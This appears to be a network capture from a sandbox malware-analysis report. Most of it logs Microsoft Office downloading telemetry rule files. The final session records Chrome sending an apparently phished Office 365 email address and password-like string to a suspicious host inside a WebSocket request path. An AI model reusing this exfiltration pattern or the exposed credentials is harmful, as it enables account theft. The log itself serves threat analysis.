                                                                                                                                                                2024-11-23 19:36:57 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                62192.168.2.44981713.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:57 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:57 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 404
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                x-ms-request-id: ae8c6dce-101e-008d-4280-3b92e5000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193657Z-174c587ffdfb485jhC1TEBmc1s000000035g00000000ec71
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:58 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                63192.168.2.44981813.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:58 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:58 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 468
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                ETag: "0x8DC582BB046B576"
                                                                                                                                                                x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193658Z-178bfbc474bq2pr7hC1NYCkfgg00000004z000000000gc3b
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:58 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                64192.168.2.44981913.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:58 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:58 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 400
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                ETag: "0x8DC582BB2D62837"
                                                                                                                                                                x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193658Z-174c587ffdftjz9shC1TEBsh98000000034g00000000pbs7
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:58 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                65192.168.2.44982013.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:58 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:58 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 479
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193658Z-174c587ffdfgcs66hC1TEB69cs000000037000000000ebfz
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:58 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                66192.168.2.44982113.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:59 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:00 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 425
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                ETag: "0x8DC582BBA25094F"
                                                                                                                                                                x-ms-request-id: 9aadc8db-201e-000c-3931-3c79c4000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193700Z-178bfbc474b7cbwqhC1NYC8z4n00000004t000000000ehnq
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:00 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                67192.168.2.44982213.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:59 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:00 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 475
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                x-ms-request-id: 8b9ec706-101e-000b-544c-3c5e5c000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193700Z-15b8b599d88g5tp8hC1TEByx6w000000038g00000000gwd4
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:00 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                68192.168.2.44982413.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:00 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:00 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 491
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                ETag: "0x8DC582B98B88612"
                                                                                                                                                                x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193700Z-178bfbc474bwh9gmhC1NYCy3rs00000004xg00000000gcgn
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:00 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                69192.168.2.44982313.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:00 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:00 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 448
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                ETag: "0x8DC582BB389F49B"
                                                                                                                                                                x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193700Z-178bfbc474bpnd5vhC1NYC4vr400000004ug00000000g23e
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:00 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                70192.168.2.44982513.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:00 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:00 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 416
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                x-ms-request-id: ecf1de78-401e-0047-5d4b-3c8597000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193700Z-15b8b599d88z9sc7hC1TEBkr4w00000003h0000000007sdc
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:00 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                71192.168.2.44982687.120.114.1724434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:00 UTC578OUTGET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1
                                                                                                                                                                Host: nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Sec-WebSocket-Key: D4D3VZCriZey2/qjQYxAyA==
                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                2024-11-23 19:37:01 UTC206INHTTP/1.1 400 Bad Request
                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                Sec-Websocket-Version: 13
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:01 GMT
                                                                                                                                                                Content-Length: 148
                                                                                                                                                                Connection: close
